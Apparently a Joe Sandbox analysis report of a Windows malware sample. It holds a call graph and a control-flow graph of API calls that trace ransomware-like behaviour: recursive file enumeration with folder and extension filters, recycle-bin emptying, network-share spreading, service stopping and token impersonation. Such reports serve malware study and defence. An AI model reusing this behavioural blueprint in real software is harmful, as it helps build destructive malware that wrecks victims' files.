5274->5275 5276 40b042 5275->5276 5278 409f60 3 API calls 5275->5278 5277 40b067 5276->5277 5280 40b05e free 5276->5280 5279 40b081 5277->5279 5281 40b078 free 5277->5281 5282 40ae76 5278->5282 5279->5058 5280->5277 5281->5279 5282->5276 5283 40c330 2 API calls 5282->5283 5284 40aeab 5283->5284 5284->5276 5285 40c330 2 API calls 5284->5285 5288 40aec2 5285->5288 5286 40c1f0 2 API calls 5287 40b02d 5286->5287 5287->5276 5289 409f60 3 API calls 5287->5289 5288->5276 5290 40c330 calloc free 5288->5290 5291 40c440 calloc free free free 5288->5291 5292 40b020 5288->5292 5289->5276 5290->5288 5291->5288 5292->5286 5294 40c550 8 API calls 5293->5294 5295 40c549 5294->5295 5295->5110 5295->5116 5297 40f034 5296->5297 5298 40f05e 5297->5298 5299 40bab0 36 API calls 5297->5299 5302 40f07f 5297->5302 5300 40f262 5298->5300 5301 40bab0 36 API calls 5298->5301 5298->5302 5299->5298 5303 40add0 free 5300->5303 5301->5302 5302->5300 5304 40bf10 9 API calls 5302->5304 5306 40f0ad 5302->5306 5305 40f28a 5303->5305 5304->5306 5307 40add0 free 5305->5307 5306->5300 5309 40bf10 9 API calls 5306->5309 5308 40d0f2 5307->5308 5308->5119 5324 40ee70 5308->5324 5310 40f1a7 5309->5310 5310->5300 5311 40c510 8 API calls 5310->5311 5312 40f1c0 5311->5312 5312->5300 5313 40c510 8 API calls 5312->5313 5314 40f1d9 5313->5314 5314->5300 5315 40bd30 23 API calls 5314->5315 5316 40f1f4 5315->5316 5316->5300 5317 40bf10 9 API calls 5316->5317 5318 40f221 5317->5318 5318->5300 5319 40c510 8 API calls 5318->5319 5320 40f236 5319->5320 5320->5300 5321 40c510 8 API calls 5320->5321 5322 40f24b 5321->5322 5322->5300 5323 40bd30 23 API calls 5322->5323 5323->5300 5325 40ee84 5324->5325 5326 40c510 8 API calls 5325->5326 5342 40eee3 5325->5342 5347 40efb6 5325->5347 5329 40eeae 5326->5329 5327 40add0 free 5330 40effd 5327->5330 5328 40c510 8 API calls 5331 40ef22 5328->5331 5334 40c550 8 API calls 5329->5334 5329->5347 5333 40add0 free 5330->5333 5337 40c550 8 API calls 5331->5337 5331->5347 5332 40bf10 9 API calls 5335 40ef8d 5332->5335 5336 40f006 5333->5336 5338 40eec8 5334->5338 5341 40c510 8 API calls 5335->5341 5335->5347 5336->5119 5339 40ef3e 5337->5339 5340 40bd30 23 API calls 5338->5340 5338->5347 5344 40bd30 23 API calls 5339->5344 5339->5347 5340->5342 5343 40efa2 5341->5343 5342->5328 5345 40ef59 5342->5345 5342->5347 5346 40bd30 23 API calls 5343->5346 5343->5347 5344->5345 5345->5332 5345->5347 5346->5347 5347->5327 5349 40d810 5348->5349 5356 40d818 5348->5356 5349->4850 5350 40d8c7 5367 40d8f0 5350->5367 5351 40d8af 5358 40de20 5351->5358 5354 40d8b5 5354->4850 5355 40d8d3 5355->4850 5356->5350 5356->5351 5357 40d8bd 5356->5357 5357->4850 5360 40de38 5358->5360 5359 40df20 5359->5354 5360->5359 5361 40c0e0 5 API calls 5360->5361 5365 40dea3 5361->5365 5362 40debd 5363 40add0 free 5362->5363 5364 40df03 5363->5364 5364->5354 5365->5362 5366 40a5e0 28 API calls 5365->5366 5366->5362 5369 40d91a 5367->5369 5368 40d921 5368->5355 5369->5368 5370 40c0e0 5 API calls 5369->5370 5373 40d99f 5370->5373 5371 40add0 free 5372 40dda0 5371->5372 5374 40add0 free 5372->5374 5376 409f60 3 API calls 5373->5376 5436 40d9c1 5373->5436 5375 40dda9 5374->5375 5377 40add0 free 5375->5377 5378 40d9d8 5376->5378 5379 40ddb2 5377->5379 5382 40d9fe 5378->5382 5403 40da5f 5378->5403 5378->5436 5449 40dc1d 5378->5449 5380 40ddcd 5379->5380 5384 40add0 free 5379->5384 5383 40add0 free 5380->5383 5381 40a5e0 28 API calls 5386 40dc49 5381->5386 5387 40bf10 9 API calls 5382->5387 5388 40ddd9 5383->5388 5385 40ddc4 5384->5385 5390 40add0 free 5385->5390 5393 40a5e0 28 API calls 5386->5393 5386->5436 5391 40da06 5387->5391 5392 40add0 free 5388->5392 5389 40acd0 5 API calls 5389->5403 5390->5380 5396 40bd30 23 API calls 5391->5396 5391->5436 5394 40dde2 5392->5394 5395 40dc72 5393->5395 5397 40add0 free 5394->5397 5401 40c550 8 API calls 5395->5401 5395->5436 5399 40da1e 5396->5399 5400 40ddeb 5397->5400 5398 40ae20 10 API calls 5398->5403 5405 40bf10 9 API calls 5399->5405 5399->5436 5402 40add0 free 5400->5402 5404 40dc90 5401->5404 5406 40ddf4 5402->5406 5403->5389 5403->5398 5411 40dacd 5403->5411 5403->5436 5409 40bf10 9 API calls 5404->5409 5404->5436 5407 40da39 5405->5407 5408 40add0 free 5406->5408 5413 40bd30 23 API calls 5407->5413 5407->5436 5410 40ddfd 5408->5410 5412 40dcae 5409->5412 5410->5355 5414 40b500 34 API calls 5411->5414 5417 40bd30 23 API calls 5412->5417 5412->5436 5415 40da57 5413->5415 5416 40dade 5414->5416 5419 40bf10 9 API calls 5415->5419 5415->5436 5420 40a5e0 28 API calls 5416->5420 5416->5436 5418 40dccc 5417->5418 5421 40bf10 9 API calls 5418->5421 5418->5436 5422 40db16 5419->5422 5420->5415 5423 40dcea 5421->5423 5424 40bd30 23 API calls 5422->5424 5422->5436 5425 409cd0 8 API calls 5423->5425 5423->5436 5426 40db31 5424->5426 5427 40dd08 5425->5427 5428 40c510 8 API calls 5426->5428 5426->5436 5429 40dd3f 5427->5429 5431 40bf10 9 API calls 5427->5431 5427->5436 5430 40db4d 5428->5430 5432 40a5e0 28 API calls 5429->5432 5429->5436 5434 40c510 8 API calls 5430->5434 5430->5436 5433 40dd2b 5431->5433 5432->5436 5433->5436 5437 40bd30 23 API calls 5433->5437 5435 40db69 5434->5435 5435->5436 5438 40acd0 5 API calls 5435->5438 5436->5371 5437->5429 5439 40db87 5438->5439 5439->5436 5440 40bf10 9 API calls 5439->5440 5441 40dba5 5440->5441 5441->5436 5442 409cd0 8 API calls 5441->5442 5443 40dbc0 5442->5443 5443->5436 5444 40acd0 5 API calls 5443->5444 5445 40dbe4 5444->5445 5445->5436 5446 40bf10 9 API calls 5445->5446 5447 40dc02 5446->5447 5447->5436 5448 409cd0 8 API calls 5447->5448 5448->5449 5449->5381 5449->5436 5451 4180c4 NtRemoveIoCompletion 5450->5451 5451->5451 5462 4180e5 __allrem 5451->5462 5452 418247 RtlDosPathNameToNtPathName_U 5454 418269 malloc 5452->5454 5452->5462 5453 4184c2 NtClose GlobalFree GlobalFree 5453->5451 5454->5462 5455 4182fa NtClose GlobalFree GlobalFree 5455->5451 5456 418495 ReadFile 5456->5462 5457 4182ad NtSetInformationFile free 5457->5462 5459 418228 WriteFile 5459->5462 5460 4183f8 WriteFile 5460->5462 5461 4183df NtClose GlobalFree GlobalFree 5461->5460 5462->5451 5462->5452 5462->5453 5462->5455 5462->5456 5462->5457 5462->5459 5462->5460 5462->5461 5464 4184e0 5462->5464 5465 412920 6 API calls 5464->5465 5467 4184fd 5465->5467 5466 418545 5466->5462 5467->5466 5468 40d800 45 API calls 5467->5468 5469 4185c0 5468->5469 5469->5462 5469->5469 5471 4101bf wsprintfW FindFirstFileExW 5470->5471 5472 41019e 5470->5472 5473 4102f0 FindClose 5471->5473 5474 4102d6 RtlLeaveCriticalSection ExitThread 5471->5474 5472->5471 5475 4101a4 lstrcmpiW 5472->5475 5476 410364 5473->5476 5475->5472 5475->5474 5476->5476 5477 410379 wsprintfW CreateFileW 5476->5477 5478 4103e6 malloc 5477->5478 5479 4103bf 5477->5479 5481 41040e 5478->5481 5479->5478 5480 4103cc RtlLeaveCriticalSection ExitThread 5479->5480 5482 410444 RtlLeaveCriticalSection SHEmptyRecycleBinW GetDiskFreeSpaceExW 5481->5482 5483 4104f5 5482->5483 5484 41047d SetThreadUILanguage StrFormatByteSize64A StrFormatByteSize64A 5482->5484 5486 410530 166 API calls 5483->5486 5485 4104cf 5484->5485 5488 4104d6 wsprintfA 5485->5488 5487 4104ff CloseHandle DeleteFileW ExitThread 5486->5487 5489 40f630 14 API calls 5488->5489 5489->5483 5519 4176f0 GetShellWindow 5490->5519 5492 40fa7c 5493 40fa8f 5492->5493 5527 40fae0 GetLogicalDrives 5492->5527 5495 40fae0 208 API calls 5493->5495 5496 40fa94 ExitThread 5495->5496 5557 417790 OpenProcessToken 5498->5557 5500 40fabc 5501 40fac5 ExitThread 5500->5501 5502 40fae0 208 API calls 5500->5502 5502->5501 5504 41a4d1 5503->5504 5505 41a473 malloc 5503->5505 5506 41a487 RtlInitializeSListHead RtlInitializeCriticalSection Sleep 5505->5506 5507 41a4cb WSACleanup 5505->5507 5583 41a130 malloc 5506->5583 5507->5504 5510 41a4b4 RtlInterlockedFlushSList RtlDeleteCriticalSection 5510->5507 5511 41a4dc 5512 41a4e0 CreateThread 5511->5512 5514 41a515 Sleep 5511->5514 5512->5511 5513 41a4ff NtSetInformationThread 5512->5513 5598 419bd0 5512->5598 5513->5511 5514->5514 5515 41a525 5514->5515 5515->5514 5516 41a52e RtlInterlockedFlushSList RtlDeleteCriticalSection WSACleanup 5515->5516 5517 41a554 free 5516->5517 5518 41a55e ExitThread 5516->5518 5517->5518 5520 417700 5519->5520 5521 417704 GetWindowThreadProcessId OpenProcess 5519->5521 5520->5492 5522 417782 5521->5522 5523 417727 OpenProcessToken 5521->5523 5522->5492 5524 417774 CloseHandle CloseHandle 5523->5524 5525 417738 DuplicateToken 5523->5525 5524->5522 5525->5524 5526 41774b SetThreadToken FindCloseChangeNotification CloseHandle CloseHandle 5525->5526 5526->5492 5528 40fb10 5527->5528 5529 40fb1d GetDriveTypeW 5528->5529 5531 40fbde 5528->5531 5529->5528 5530 40fb30 malloc WNetGetConnectionW 5529->5530 5532 40fbc3 free 5530->5532 5533 40fb5d PathRemoveBackslashW OpenThreadToken 5530->5533 5539 40fbf0 WNetOpenEnumW 5531->5539 5532->5528 5535 40fb78 5533->5535 5536 40fb7d DuplicateToken 5533->5536 5538 40fb95 CreateThread 5535->5538 5536->5538 5537 40fa85 SetThreadToken 5537->5493 5538->5528 5540 40fc19 5539->5540 5541 40fc1f malloc 5539->5541 5540->5537 5542 40fc35 5541->5542 5548 40fc3a 5541->5548 5542->5537 5543 40fc4b WNetEnumResourceW 5544 40fd5a free WNetCloseEnum 5543->5544 5543->5548 5544->5537 5545 40fbf0 189 API calls 5545->5548 5546 40fc8b malloc 5546->5548 5547 40fcd2 OpenThreadToken 5547->5548 5549 40fcee DuplicateToken 5547->5549 5548->5543 5548->5545 5548->5546 5548->5547 5550 40fd06 CreateThread 5548->5550 5549->5550 5550->5548 5551 40fd25 NtSetInformationThread 5550->5551 5552 40fd80 5550->5552 5551->5548 5553 40fd97 5552->5553 5554 40fd8e SetThreadToken 5552->5554 5555 410170 188 API calls 5553->5555 5554->5553 5556 40fda0 5555->5556 5558 4177b1 GetTokenInformation 5557->5558 5559 417837 5557->5559 5560 41782d CloseHandle 5558->5560 5561 4177cf 5558->5561 5559->5500 5560->5559 5561->5560 5562 4177d6 GetTokenInformation 5561->5562 5562->5560 5563 4177ee GetTokenInformation CloseHandle 5562->5563 5563->5560 5564 417812 5563->5564 5568 4175d0 CreateToolhelp32Snapshot 5564->5568 5567 417823 5567->5500 5569 4175f5 5568->5569 5570 4176dd 5568->5570 5571 417611 Process32First 5569->5571 5570->5560 5570->5567 5572 417633 OpenProcess 5571->5572 5573 4176da CloseHandle 5571->5573 5574 4176c1 Process32Next 5572->5574 5575 41764c OpenProcessToken 5572->5575 5573->5570 5574->5572 5576 4176d7 5574->5576 5577 4176b8 FindCloseChangeNotification 5575->5577 5578 41765d GetTokenInformation 5575->5578 5576->5573 5577->5574 5577->5576 5579 4176b3 CloseHandle 5578->5579 5580 417676 5578->5580 5579->5577 5580->5579 5581 417686 DuplicateToken 5580->5581 5581->5579 5582 4176a0 SetThreadToken FindCloseChangeNotification 5581->5582 5582->5579 5584 41a321 5583->5584 5585 41a15d GetAdaptersInfo 5583->5585 5584->5510 5584->5511 5586 41a16f free malloc 5585->5586 5587 41a18e GetAdaptersInfo 5585->5587 5586->5584 5586->5587 5588 41a310 5587->5588 5593 41a19d 5587->5593 5588->5584 5589 41a317 free 5588->5589 5589->5584 5590 41a1bd lstrcmpiA 5591 41a217 PathRemoveExtensionA 5590->5591 5590->5593 5591->5593 5592 40f630 14 API calls 5592->5593 5593->5584 5593->5588 5593->5590 5593->5592 5594 41a260 wsprintfA lstrcmpiA 5593->5594 5594->5593 5595 41a2b5 malloc 5594->5595 5596 41a2d0 5595->5596 5596->5596 5597 41a2dd RtlInterlockedPushEntrySList 5596->5597 5597->5593 5600 419be8 5598->5600 5599 419bf0 RtlEnterCriticalSection 5599->5600 5600->5599 5601 419d17 RtlLeaveCriticalSection ExitThread 5600->5601 5602 419c0d RtlInterlockedPopEntrySList 5600->5602 5605 419c6f malloc wsprintfW 5600->5605 5607 41a330 10 API calls 5600->5607 5602->5600 5603 419c21 free RtlLeaveCriticalSection 5602->5603 5608 41a330 inet_addr htons 5603->5608 5618 419d30 5605->5618 5607->5600 5609 41a375 socket 5608->5609 5610 41a3ab 5608->5610 5609->5610 5611 41a388 ioctlsocket 5609->5611 5610->5600 5612 41a3b2 connect 5611->5612 5613 41a3a4 closesocket 5611->5613 5614 41a440 closesocket 5612->5614 5615 41a3c4 WSAGetLastError 5612->5615 5613->5610 5614->5600 5615->5613 5616 41a3d1 select 5615->5616 5616->5613 5617 41a42a __WSAFDIsSet 5616->5617 5617->5610 5617->5614 5619 419d58 5618->5619 5619->5619 5620 419d8f wsprintfA GetModuleHandleA GetProcAddress 5619->5620 5621 419e90 GetModuleHandleA GetProcAddress 5620->5621 5623 419eba 5621->5623 5628 419ee3 5621->5628 5627 419ed3 gethostbyaddr 5623->5627 5623->5628 5624 419f50 wsprintfW WNetAddConnection2W 5625 41a067 NetShareEnum 5624->5625 5625->5628 5626 41a0b5 NetApiBufferFree 5626->5625 5626->5628 5627->5628 5628->5624 5628->5626 5629 41a0df 5628->5629 5630 417790 18 API calls 5628->5630 5631 41a0eb 5628->5631 5629->5600 5630->5628 5632 410170 188 API calls 5631->5632 5633 41a125 5632->5633 5636 41a589 5634->5636 5635 41a693 5635->4484 5636->5635 5636->5636 5637 41a65c CoGetObject 5636->5637 5637->4484 5639 401296 GdipCreateFont 5638->5639 5640 40124e 5638->5640 5643 401300 GdipDeleteFontFamily 5639->5643 5644 4012b6 5639->5644 5641 401258 GdipGetGenericFontFamilySansSerif 5640->5641 5642 401279 5640->5642 5641->5642 5642->5639 5645 401285 GdipDeleteFontFamily 5642->5645 5643->4493 5646 4012c0 GdipGetGenericFontFamilySansSerif 5644->5646 5647 4012de 5644->5647 5645->4493 5646->5647 5647->5643 5648 4012ea GdipCreateFont 5647->5648 5648->5643 5649->4500 5650->4508 5652 4011bd GdipDrawString 5651->5652 5654 4011f6 5652->5654 5654->4511 5654->4514 5656 412406 malloc 5655->5656 5657 4123ff 5655->5657 5658 412417 5656->5658 5659 41241f GdipGetImageEncoders 5656->5659 5657->4516 5658->4516 5660 412478 free 5659->5660 5661 412435 5659->5661 5660->4516 5661->5660 5662 41248c free 5661->5662 5662->4516 5664 401370 5663->5664 5665 411cf6 GetCurrentProcess OpenProcessToken 5664->5665 5666 411d14 GetTokenInformation 5665->5666 5667 411d36 5665->5667 5666->5667 5668 411d44 RegCreateKeyExA 5667->5668 5669 411d3d CloseHandle 5667->5669 5670 411e35 5668->5670 5671 411d74 5668->5671 5669->5668 5670->4540 5671->5671 5672 411da5 RegQueryValueExW 5671->5672 5673 411dd3 lstrcmpiW 5672->5673 5674 411dea RegSetValueExW 5672->5674 5673->5674 5676 411e22 RegCloseKey 5673->5676 5674->5676 5676->4540 5678 401cf0 5677->5678 5678->4547 5678->5678 5680 417500 5679->5680 5681 4174f5 5679->5681 5682 4175b3 FindVolumeClose ExitThread 5680->5682 5683 41755d QueryDosDeviceW 5680->5683 5697 4172f0 malloc 5680->5697 5683->5680 5683->5682 5685 41759c FindNextVolumeW 5685->5680 5685->5682 5687 40f833 5686->5687 5687->5687 5688 40f841 7 API calls 5687->5688 5689 40f8bb 6 API calls 5688->5689 5690 40f89f EnableMenuItem DeleteMenu 5688->5690 5691 40f966 5689->5691 5695 40f91b 5689->5695 5690->5689 5692 40f921 PeekMessageW 5693 40f951 GetMessageW 5692->5693 5692->5695 5693->5691 5693->5692 5694 40f943 ShowWindow 5694->5693 5695->5692 5695->5693 5695->5694 5698 4173f6 5697->5698 5699 41731f 5697->5699 5698->5685 5700 417320 GetVolumePathNamesForVolumeNameW 5699->5700 5701 41735f GetDriveTypeW 5699->5701 5702 417340 free malloc 5699->5702 5700->5699 5700->5701 5703 41736b 5701->5703 5702->5700 5704 417358 5702->5704 5705 4173e8 5703->5705 5706 417376 wsprintfW CreateFileW 5703->5706 5704->5685 5705->5698 5707 4173ec free 5705->5707 5708 4173e1 NtClose 5706->5708 5709 4173d8 5706->5709 5707->5698 5708->5705 5712 417400 wsprintfW SetVolumeMountPointW 5709->5712 5713 417448 5712->5713 5716 417482 5712->5716 5714 4173df 5713->5714 5715 41744e wsprintfW SetVolumeMountPointW 5713->5715 5714->5705 5715->5713 5715->5716 5716->5716 5717 40f630 14 API calls 5716->5717 5717->5714 5718 4125c0 NtOpenProcessToken 5719 412676 5718->5719 5720 4125dc 5718->5720 5721 4125f5 LookupPrivilegeValueA NtAdjustPrivilegesToken 5720->5721 5722 41266d FindCloseChangeNotification 5721->5722 5723 412635 5721->5723 5722->5719 5723->5723 5724 40f630 14 API calls 5723->5724 5725 41266a 5724->5725 5725->5722 5726 417840 OpenThreadToken 5727 417861 DuplicateToken 5726->5727 5728 41785a 5726->5728 5741 416800 GetTickCount EnumDependentServicesA 5742 416983 5741->5742 5743 416838 5741->5743 5744 416845 5743->5744 5745 41684e malloc 5743->5745 5745->5744 5746 416861 5745->5746 5747 41686c EnumDependentServicesA 5746->5747 5747->5744 5748 416886 5747->5748 5749 416977 free 5748->5749 5750 4168a0 OpenServiceA 5748->5750 5749->5742 5750->5744 5751 4168ce ControlService 5750->5751 5751->5744 5755 4168e3 5751->5755 5752 416957 CloseServiceHandle 5752->5749 5752->5750 5753 4168f0 Sleep QueryServiceStatusEx 5753->5744 5753->5755 5754 41691a GetTickCount 5754->5744 5754->5755 5755->5752 5755->5753 5755->5754 5756 40f630 14 API calls 5755->5756 5756->5755 5757 412510 CreateThread 5758 41253d 5757->5758 5759 41252e NtSetInformationThread 5757->5759 5759->5758 5764 411a30 5765 411a48 5764->5765 5766 411e40 41 API calls 5765->5766 5767 411a6e 5766->5767 5782 41a6b0 5783 41a6cb 5782->5783 5784 41a72f 5782->5784 5785 41a70c RtlInitUnicodeString RtlInitUnicodeString 5783->5785 5729 40fa63 5730 40fa70 5729->5730 5731 4176f0 11 API calls 5730->5731 5732 40fa7c 5731->5732 5733 40fa8f 5732->5733 5734 40fae0 208 API calls 5732->5734 5735 40fae0 208 API calls 5733->5735 5737 40fa85 SetThreadToken 5734->5737 5736 40fa94 ExitThread 5735->5736 5737->5733

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 410530-41058e wsprintfW FindFirstFileExW 1 410594-41125c 0->1 2 411a1c-411a22 0->2 3 411263-41126e 1->3 4 411270-41127a 3->4 5 411294-41129b 3->5 8 41128b-41128e 4->8 9 41127c-411284 4->9 6 4112a1-4112b3 lstrcmpiW 5->6 7 411527-411532 5->7 10 411a02-411a0f FindNextFileW 6->10 11 4112b9-4112cb lstrcmpiW 6->11 12 411960-41196b 7->12 13 411538-411540 7->13 8->5 8->10 9->5 14 411286 9->14 10->3 16 411a15-411a16 FindClose 10->16 11->10 15 4112d1-4112e3 lstrcmpiW 11->15 17 411970-41197e 12->17 13->13 18 411542-411545 13->18 14->10 15->10 19 4112e9-4112fb lstrcmpiW 15->19 16->2 17->17 20 411980-411993 PathAddBackslashW 17->20 18->12 21 41154b-41155c PathFindExtensionW 18->21 19->10 24 411301-411313 lstrcmpiW 19->24 25 411995-41199e 20->25 22 411562-411567 21->22 23 4118b8-4118ca lstrcmpiW 21->23 22->23 26 41156d 22->26 27 4118d0-4118e2 lstrcmpiW 23->27 28 4119fc 23->28 24->10 29 411319-41132b lstrcmpiW 24->29 25->25 30 4119a0-4119ab 25->30 31 411570-411578 26->31 27->28 32 4118e8-4118fa lstrcmpiW 27->32 28->10 29->10 33 411331-411340 lstrcmpiW 29->33 34 4119b0-4119ba 30->34 31->31 36 41157a-41157c 31->36 32->28 37 411900-411912 lstrcmpiW 32->37 33->10 38 411346-411358 lstrcmpiW 33->38 34->34 35 4119bc-4119d2 34->35 39 4119d4-4119d6 35->39 40 4119f9 35->40 36->23 41 411582-41158b lstrcmpiW 36->41 37->28 42 411918-41192a lstrcmpiW 37->42 38->10 43 41135e-411370 lstrcmpiW 38->43 44 4119d8-4119ec SetFileAttributesW 39->44 45 4119ee-4119f4 call 419500 39->45 40->28 41->28 46 411591-41159a lstrcmpiW 41->46 42->28 47 411930-411942 lstrcmpiW 42->47 43->10 48 411376-411388 lstrcmpiW 43->48 44->40 44->45 45->40 46->28 50 4115a0-4115a9 lstrcmpiW 46->50 47->28 51 411948-41195a lstrcmpiW 47->51 48->10 52 41138e-4113a0 lstrcmpiW 48->52 50->28 53 4115af-4115b8 lstrcmpiW 50->53 51->12 51->28 52->10 54 4113a6-4113b8 lstrcmpiW 52->54 53->28 55 4115be-4115c7 lstrcmpiW 53->55 54->10 56 4113be-4113d0 lstrcmpiW 54->56 55->28 57 4115cd-4115d9 lstrcmpiW 55->57 56->10 58 4113d6-4113e8 lstrcmpiW 56->58 57->28 59 4115df-4115e8 lstrcmpiW 57->59 58->10 60 4113ee-411400 lstrcmpiW 58->60 59->28 61 4115ee-4115f7 lstrcmpiW 59->61 60->10 62 411406-411418 lstrcmpiW 60->62 61->28 64 4115fd-411606 lstrcmpiW 61->64 62->10 63 41141e-411430 lstrcmpiW 62->63 63->10 65 411436-411448 lstrcmpiW 63->65 64->28 66 41160c-411618 lstrcmpiW 64->66 65->10 67 41144e-411460 lstrcmpiW 65->67 66->28 68 41161e-41162a lstrcmpiW 66->68 67->10 69 411466-411478 lstrcmpiW 67->69 68->28 70 411630-41163c lstrcmpiW 68->70 69->10 72 41147e-411490 lstrcmpiW 69->72 70->28 71 411642-41164e lstrcmpiW 70->71 71->28 73 411654-411660 lstrcmpiW 71->73 72->10 74 411496-4114a8 lstrcmpiW 72->74 73->28 75 411666-411672 lstrcmpiW 73->75 74->10 76 4114ae-4114c0 lstrcmpiW 74->76 75->28 77 411678-411684 lstrcmpiW 75->77 76->10 78 4114c6-4114d8 lstrcmpiW 76->78 77->28 79 41168a-411696 lstrcmpiW 77->79 78->10 80 4114de-4114f0 lstrcmpiW 78->80 79->28 81 41169c-4116a8 lstrcmpiW 79->81 80->10 82 4114f6-41151d wsprintfW call 410530 80->82 81->28 83 4116ae-4116ba lstrcmpiW 81->83 86 411522 82->86 83->28 85 4116c0-4116cc lstrcmpiW 83->85 85->28 87 4116d2-4116de lstrcmpiW 85->87 86->10 87->28 88 4116e4-4116f0 lstrcmpiW 87->88 88->28 89 4116f6-411702 lstrcmpiW 88->89 89->28 90 411708-411714 lstrcmpiW 89->90 90->28 91 41171a-411726 lstrcmpiW 90->91 91->28 92 41172c-411738 lstrcmpiW 91->92 92->28 93 41173e-41174a lstrcmpiW 92->93 93->28 94 411750-41175c lstrcmpiW 93->94 94->28 95 411762-41176e lstrcmpiW 94->95 95->28 96 411774-411780 lstrcmpiW 95->96 96->28 97 411786-411792 lstrcmpiW 96->97 97->28 98 411798-4117a4 lstrcmpiW 97->98 98->28 99 4117aa-4117b6 lstrcmpiW 98->99 99->28 100 4117bc-4117c8 lstrcmpiW 99->100 100->28 101 4117ce-4117da lstrcmpiW 100->101 101->28 102 4117e0-4117ec lstrcmpiW 101->102 102->28 103 4117f2-4117fe lstrcmpiW 102->103 103->28 104 411804-411810 lstrcmpiW 103->104 104->28 105 411816-411822 lstrcmpiW 104->105 105->28 106 411828-411834 lstrcmpiW 105->106 106->28 107 41183a-411846 lstrcmpiW 106->107 107->28 108 41184c-411858 lstrcmpiW 107->108 108->28 109 41185e-41186a lstrcmpiW 108->109 109->28 110 411870-41187c lstrcmpiW 109->110 110->28 111 411882-41188e lstrcmpiW 110->111 111->28 112 411894-4118a0 lstrcmpiW 111->112 112->28 113 4118a6-4118b2 lstrcmpiW 112->113 113->23 113->28
                                                                                                            APIs
                                                                                                            • wsprintfW.USER32 ref: 00410561
                                                                                                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,74DF3340), ref: 00410580
                                                                                                            • lstrcmpiW.KERNEL32(?,00770024,?,?,74DF3340), ref: 004112AF
                                                                                                            • lstrcmpiW.KERNEL32(?,006E0069,?,?,74DF3340), ref: 004112C7
                                                                                                            • lstrcmpiW.KERNEL32(?,0073006D,?,?,74DF3340), ref: 004112DF
                                                                                                            • lstrcmpiW.KERNEL32(?,00720024,?,?,74DF3340), ref: 004112F7
                                                                                                            • lstrcmpiW.KERNEL32(?,00770024,?,?,74DF3340), ref: 0041130F
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0074,?,?,74DF3340), ref: 00411327
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0062,?,?,74DF3340), ref: 0041133C
                                                                                                            • lstrcmpiW.KERNEL32(?,00790073,?,?,74DF3340), ref: 00411354
                                                                                                            • lstrcmpiW.KERNEL32(?,00650070,?,?,74DF3340), ref: 0041136C
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0067,?,?,74DF3340), ref: 00411384
                                                                                                            • lstrcmpiW.KERNEL32(?,00700061,?,?,74DF3340), ref: 0041139C
                                                                                                            • lstrcmpiW.KERNEL32(?,00690077,?,?,74DF3340), ref: 004113B4
                                                                                                            • lstrcmpiW.KERNEL32(?,00690077,?,?,74DF3340), ref: 004113CC
                                                                                                            • lstrcmpiW.KERNEL32(?,00700061,?,?,74DF3340), ref: 004113E4
                                                                                                            • lstrcmpiW.KERNEL32(?,00690057,?,?,74DF3340), ref: 004113FC
                                                                                                            • lstrcmpiW.KERNEL32(?,0073004D,?,?,74DF3340), ref: 00411414
                                                                                                            • lstrcmpiW.KERNEL32(?,0069004D,?,?,74DF3340), ref: 0041142C
                                                                                                            • lstrcmpiW.KERNEL32(?,006C0041,?,?,74DF3340), ref: 00411444
                                                                                                            • lstrcmpiW.KERNEL32(?,006F006D,?,?,74DF3340), ref: 0041145C
                                                                                                            • lstrcmpiW.KERNEL32(?,0069004D,?,?,74DF3340), ref: 00411474
                                                                                                            • lstrcmpiW.KERNEL32(?,0069006D,?,?,74DF3340), ref: 0041148C
                                                                                                            • lstrcmpiW.KERNEL32(?,006E0049,?,?,74DF3340), ref: 004114A4
                                                                                                            • lstrcmpiW.KERNEL32(?,006F0063,?,?,74DF3340), ref: 004114BC
                                                                                                            • lstrcmpiW.KERNEL32(?,0070006F,?,?,74DF3340), ref: 004114D4
                                                                                                            • lstrcmpiW.KERNEL32(?,00690057,?,?,74DF3340), ref: 004114EC
                                                                                                            • wsprintfW.USER32 ref: 0041150E
                                                                                                            • PathFindExtensionW.SHLWAPI(?,?,?,74DF3340), ref: 00411552
                                                                                                            • lstrcmpiW.KERNEL32(0033002E,00000000,?,?,74DF3340), ref: 00411587
                                                                                                            • lstrcmpiW.KERNEL32(0063002E,00000000,?,?,74DF3340), ref: 00411596
                                                                                                            • lstrcmpiW.KERNEL32(0065002E,00000000,?,?,74DF3340), ref: 004115A5
                                                                                                            • lstrcmpiW.KERNEL32(0061002E,00000000,?,?,74DF3340), ref: 004115B4
                                                                                                            • lstrcmpiW.KERNEL32(0061002E,00000000,?,?,74DF3340), ref: 004115C3
                                                                                                            • lstrcmpiW.KERNEL32(0074002E,00000000,?,?,74DF3340), ref: 004115D5
                                                                                                            • lstrcmpiW.KERNEL32(006D002E,00000000,?,?,74DF3340), ref: 004115E4
                                                                                                            • lstrcmpiW.KERNEL32(006D002E,00000000,?,?,74DF3340), ref: 004115F3
                                                                                                            • lstrcmpiW.KERNEL32(0063002E,00000000,?,?,74DF3340), ref: 00411602
                                                                                                            • lstrcmpiW.KERNEL32(0064002E,00000000,?,?,74DF3340), ref: 00411614
                                                                                                            • lstrcmpiW.KERNEL32(006E002E,00000000,?,?,74DF3340), ref: 00411626
                                                                                                            • lstrcmpiW.KERNEL32(0064002E,00000000,?,?,74DF3340), ref: 00411638
                                                                                                            • FindNextFileW.KERNEL32(?,00000010,?,?,74DF3340), ref: 00411A0A
                                                                                                            • FindClose.KERNEL32(?,?,?,74DF3340), ref: 00411A16
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001B.00000002.3749632182.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 0000001B.00000002.3748638629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3750630560.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 0000001B.00000002.3751597258.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_27_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcmpi$Find$Filewsprintf$CloseExtensionFirstNextPath
